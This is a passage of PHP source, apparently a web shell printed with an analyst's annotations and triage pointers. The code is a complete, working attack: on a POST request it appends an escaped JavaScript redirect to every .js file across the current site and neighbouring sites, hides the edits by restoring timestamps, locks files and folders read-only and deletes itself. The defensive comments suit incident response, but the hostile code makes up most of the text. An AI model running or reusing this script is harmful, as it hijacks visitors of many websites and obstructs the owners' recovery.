';
// The statement closed by the quote above starts before this excerpt.
//
// Analyst annotation (behaviour read from the code below):
//   - Requires the POST parameter 'domain'; exits silently without it.
//   - Walks the current web root and neighbouring site directories. Each *.js
//     file it reaches gets a `window.location.href = "...";` statement appended
//     (an existing one may be substituted first). The URL is 'https://' plus the
//     posted domain, written as \xNN escapes.
//   - Restores each file's earlier mtime/atime with touch(), leaves files at 0444
//     and their directories at 0555, prints 'Done', then deletes itself.
// Triage pointers:
//   - Compare *.js files against known-good copies or hashes; mtime is not
//     trustworthy here. On POSIX filesystems touch() does not reset ctime, so
//     ctime remains a usable signal.
//   - Search script files for `window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f`
//     (the escaped form of 'https://' that hexfromdec() below always produces).
//   - Look for unexpected 0444 files / 0555 directories under script folders.
//   - Review access logs for a POST to a PHP file that no longer exists on disk.

// Compatibility shim: defines explode() via split() only if explode() is missing.
if (!function_exists('explode')) {
    function explode($str, $array) {
        return split($str, $array);
    }
}

// No 'domain' in the POST body: stop without output.
if (empty($_POST['domain'])){
    exit(0);
}

// Encodes every byte of $txt as a lowercase, zero-padded `\xNN` escape and
// returns the concatenation (e.g. "a" becomes the four characters \x61).
function hexfromdec($txt) {
    $hexx = '';
    $len = strlen($txt);
    for ($i = 0; $i < $len; $i++) {
        $hex = dechex(ord($txt[$i]));
        if (strlen($hex) === 1) {
            $hex = '0' . $hex;
        }
        // '\\x' in single quotes is the two characters backslash + x.
        $hexx .= '\\x' . $hex;
    }
    return $hexx;
}

// Returns whether $FullStr ends with $needle (loose == comparison of the tail).
function endsWith($FullStr, $needle) {
    $StrLen = strlen($needle);
    $FullStrEnd = substr($FullStr, strlen($FullStr) - $StrLen);
    return $FullStrEnd == $needle;
}

// Derives the parent directory of path $p1 by string manipulation.
// A path without any '/' resolves to the real path of the current directory.
function folder_of_file($p1){
    if(!stristr($p1, '/')){
        return realpath('./');
    }
    if(strpos($p1, '//') !== false){
        $p1 = str_replace('//','/',$p1);
    }
    // Drop one trailing slash so the last segment is the entry itself.
    if(endsWith($p1, '/') == true){
        $p1 = substr_replace($p1 ,'', -1);
    }
    $p2 = '';
    $ar = explode('/', $p1);
    // Rebuild from segment 1 up to (not including) the last segment; segment 0
    // is empty for absolute paths and '.' or '..' for relative ones.
    for($i=1; $i < count($ar) - 1; $i++){
        $p2 .= '/'.$ar[$i];
    }
    // Re-attach the relative prefix that the loop skipped.
    if($p1[0] == '.' && $p1[1] == '/'){
        $p2 = './'.$p2;
    }
    if($p1[0] == '.' && $p1[1] == '.'){
        $p2 = '../'.$p2;
    }
    if(strpos($p2, '//') !== false){
        $p2 = str_replace('//','/',$p2);
    }
    return trim($p2);
}

// Writes $source to $path and returns the write call's result.
// On non-Windows hosts it first loosens permissions: parent directory to 0755
// if not writable, existing file to 0644 if not writable. These mode changes
// are themselves filesystem evidence of the run.
function save($path, $source){
    $os = strtolower(substr(PHP_OS, 0, 3));
    $folder_P = folder_of_file($path);
    if (!is_writable($folder_P) && $os != "win"){
        chmod($folder_P, 0755);
    }
    if (file_exists($path) && is_file($path) && !is_writable($path) && $os != "win"){
        chmod($path, 0644);
    }
    if(function_exists('file_put_contents')){
        $saV = file_put_contents($path, $source);
    }else{
        $saV = fwrite(fopen($path, 'w'), $source);
    }
    return $saV;
}

// Returns the contents of $path using whichever read function is available.
// Despite the name, nothing visible here cleans or filters the data.
function read_cleaned($path){
    $contents = '';
    if(function_exists('file_get_contents')){
        $contents = file_get_contents($path);
    }elseif(function_exists('fopen') && function_exists('stream_get_contents')){
        $contents = stream_get_contents(fopen($path, "r"));
    }elseif(function_exists('implode') && function_exists('file')){
        $contents = implode(file($path));
    }elseif(function_exists('file')){
        $lines = file($path);
        if(function_exists('implode')){
            $contents = implode($lines);
        }else{
            foreach($lines as $line){
                $contents .= $line;
            }
        }
    }
    return
$contents;
}

// Returns '/<name>/' for the first common web-root folder name found in $p2,
// or '/' when none of the listed names occurs.
function getPath($p2){
    $homes = array('public_html', 'httpdocs', 'httpsdocs', 'www', 'web', 'docs', 'htdocs', 'html', 'site');
    foreach($homes as $home){
        if(preg_match("/\/".$home."/", $p2)){
            return '/'.$home.'/';
        }
    }
    return '/';
}

// Rewrites one file so that it ends with the redirect statement held in the
// global $new_index, then hides the change from timestamp-based checks.
// Remediation note: the original content is not kept anywhere by this code, so
// affected files need restoring from a known-good source.
function fucked_index($file){
    global $new_index;
    // Remember the current mtime (errors suppressed) so it can be put back.
    $old_time = strtotime(date("Y-m-d H:i:s", @filemtime($file)));
    // $file_name ends up as the last path segment; it is not used again below.
    $file_name = str_replace('\\', '/', $file);
    $file_name = explode('/', $file);
    $file_name = $file_name[count($file_name)-1];
    $old_file = read_cleaned($file);
    // If the file already holds `window.location.href = "...";` statements,
    // a substituted copy is written first and then re-read.
    if(preg_match_all("#window\.location\.href = \"(.*)\";#", $old_file, $old_codes)){
        foreach($old_codes[0] as $old){
            $index = str_replace($old, $new_index, $old_file);
        }
        chmod($file, 0644);
        $save = save($file, $index);
        // Write failed: remove the file and create it again with the new body.
        if (!$save){
            unlink($file);
            save($file, $index);
        }
        touch($file, $old_time, $old_time);
        $old_file = read_cleaned($file);
    }
    // Always append the redirect statement on a new last line.
    $index = trim($old_file)."\n".$new_index;
    chmod($file, 0644);
    $save = save($file, $index);
    // Leave the file read-only (0444).
    chmod($file, 0444);
    if (!$save){
        unlink($file);
        save($file, $index);
        chmod($file, 0444);
    }
    // Put back the earlier mtime/atime so the file does not look recently edited.
    touch($file, $old_time, $old_time);
}

// Recursively processes $path: every *.js file directly inside is passed to
// fucked_index() and its directory recorded in the global $js_fdrs; then each
// eligible sub-directory is visited. Returns FALSE once $couter exceeds 8.
function mass_all($path, $couter = 0){
    global $js_fdrs;
    if ($couter > 8){
        return FALSE;
    }
    $folders = glob($path.'/*', GLOB_ONLYDIR);
    $files_js = glob($path.'/*.js');
    if ($files_js){
        foreach ($files_js as $file) {
            $js_fdrs[] = dirname(realpath($file));
            fucked_index($file);
        }
    }
    if ($folders){
        $couter++;
        foreach ($folders as $dir) {
            // Last path segment of $dir (the str_replace result is overwritten).
            $folder_name = str_replace('\\', '/', $dir);
            $folder_name = explode('/', $dir);
            $folder_name = $folder_name[count($folder_name)-1];
            // Skipped: unreadable directories, symlinks, 7-character names other
            // than plugins/akismet/uploads/scripts, '.' and '..', and names
            // containing sym, root, config, 404 or well-known.
            if(!is_readable($dir) || is_link($dir) || (strlen($folder_name) == 7 && !preg_match('/plugins|akismet|uploads|scripts/i', $folder_name)) || $folder_name == '.' || $folder_name == '..'
            || preg_match("/sym/", $folder_name) || preg_match("/root/", $folder_name) || preg_match("/config/", $folder_name) || preg_match("/404/", $folder_name) || preg_match("/well-known/", $folder_name)) continue;
            mass_all($dir, $couter);
        }
    }
}

// Sets every directory recorded in $js_fdrs to mode 0555 (no write bit).
function js_fd0555(){
    global $js_fdrs;
    if($js_fdrs){
        $unique_array = array_unique($js_fdrs);
        foreach ($unique_array as $dir) {
            chmod($dir, 0555);
        }
    }
}

// Build the statement that gets written into the files: the placeholder URL is
// replaced by the \xNN-escaped form of 'https://' + the trimmed POST 'domain'.
$new_index = 'window.location.href = "https://just-test.com";';
$new_index = str_replace('https://just-test.com', hexfromdec('https://'.trim($_POST['domain'])), $new_index);

// Normalise the request path (collapse '//', drop the query string) and count
// its slashes to build a relative path ('./' plus one '../' per extra level)
// that is assumed to lead from the script's directory to the site root.
$REQUESTURI = strval($_SERVER['REQUEST_URI']);
while(strstr($REQUESTURI, '//')){
    $REQUESTURI = str_replace('//', '/', $REQUESTURI);
}
if(strstr($REQUESTURI, '?')){
    $REQUESTURI = explode('?', $REQUESTURI);
    $REQUESTURI = $REQUESTURI[0];
}
$xRoot = substr_count($REQUESTURI, '/');
$root = './';
$counter = 1;
while($counter < intval($xRoot)){
    $root .= '../';
    $counter++;
}

// Host name from the request, with 'www.' removed and then restored only if the
// working directory path contains the 'www.' form.
$pwd = @getcwd();
$domain = $_SERVER['HTTP_HOST'];
if(strstr($domain, 'www.')){
    $domain = str_replace('www.', '', $domain);
}
if (preg_match("/www\.".$domain."/", $pwd)) {
    $domain = 'www.'.$domain;
}

// Pass 1: the site the script was requested on.
$js_fdrs = array();
mass_all($root);
// Under a public_html layout, also one level above the computed root.
if(preg_match("/\/public_html/", $pwd)){
    mass_all('../'.$root);
}
// When the working directory is under app/public or public/ but the URL does
// not show that segment, climb further up and process from there as well.
if(preg_match("/\/app\/public/", $pwd) && !preg_match("/\/app\/public/", $REQUESTURI)){
    $root .= '../../';
    mass_all($root);
}elseif (preg_match("/\/public\//", $pwd) && !preg_match("/\/public\//", $REQUESTURI)){
    $root .= '../';
    mass_all($root);
}

// Pass 2: sibling sites. If the working directory path contains the host name,
// the directory holding that per-site folder is listed and every other entry
// that looks like a domain (contains a dot, is a directory, not hidden, not the
// current domain) is processed at its assumed web root.
// Incident scope therefore includes all sites writable by the same account.
$CK = 0;
if (preg_match("/$domain/", $pwd)){
    $CK = 1;
    // $p1: part of the path before the domain; $p2: part after it.
    preg_match("#(.*)$domain#", $pwd, $p1);
    preg_match("#$domain(.*)#", $pwd, $p2);
    $p1 = $p1[1];
    $p2 = $p2[1];
    $p = getPath($p2);
    // If $p1 does not end on a slash, remove its trailing partial segment
    // (e.g. a prefix glued to the domain name) to get the containing directory.
    if(endsWith($p1, '/') != TRUE){
        $gl = rtrim($p1, '/');
        $gl = explode('/', $gl);
        $gl = $gl[count($gl)-1];
        $p1 = str_replace($gl, '', $p1);
    }
    $scan_dir = scandir($p1);
    foreach($scan_dir as $dom) {
        if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...'
        && $dom != $domain && substr($dom, 0, 1) != '.'){
            $root = $p1.$dom.$p;
            mass_all($root);
        }
    }
}elseif(substr_count($domain, '.') > 1){
    // Host has more than one dot: drop the first label and repeat the same
    // sibling-site logic with the shorter domain.
    $domain2 = explode('.', $domain);
    $domain = str_replace($domain2[0].'.', '', $domain);
    if (preg_match("/$domain/", $pwd)){
        $CK = 1;
        preg_match("#(.*)$domain#", $pwd, $p1);
        preg_match("#$domain(.*)#", $pwd, $p2);
        $p1 = $p1[1];
        $p2 = $p2[1];
        $p = getPath($p2);
        if(endsWith($p1, '/') != TRUE){
            $gl = rtrim($p1, '/');
            $gl = explode('/', $gl);
            $gl = $gl[count($gl)-1];
            $p1 = str_replace($gl, '', $p1);
        }
        $scan_dir = scandir($p1);
        foreach($scan_dir as $dom) {
            if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){
                $root = $p1.$dom.'/';
                $root = $p1.$dom.$p;
                mass_all($root);
            }
        }
    }
}

// Pass 3 (only when pass 2 found nothing): under a public_html layout, list both
// the parent of public_html and public_html itself for domain-like directory
// names and process each one found.
if(preg_match("/\/public_html/", $pwd) && $CK != 1){
    $pathS = [];
    preg_match("#(.*)\/public_html#", $pwd, $p);
    $p1 = $p[1].'/';
    $p2 = $p[0].'/';
    $scan_dir = scandir($p1);
    foreach($scan_dir as $dom) {
        if (preg_match("/\./", $dom) && is_dir($p1.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){
            $root = $p1.$dom.'/';
            $pathS[$dom] = $root;
        }
    }
    $scan_dir = scandir($p2);
    foreach($scan_dir as $dom) {
        if (preg_match("/\./", $dom) && is_dir($p2.$dom) && $dom != '.' && $dom != '..' && $dom != '...' && $dom != $domain && substr($dom, 0, 1) != '.'){
            $root = $p2.$dom.'/';
            $pathS[$dom] = $root;
        }
    }
    if($pathS){
        foreach($pathS as $dom => $root) {
            mass_all($root);
        }
    }
}

// Lock the touched directories, report completion, and remove this script from
// disk. After a run the file itself is gone, so evidence has to come from web
// server logs, file modes and the modified script files.
js_fd0555();
echo 'Done';
unlink( __FILE__ );
?>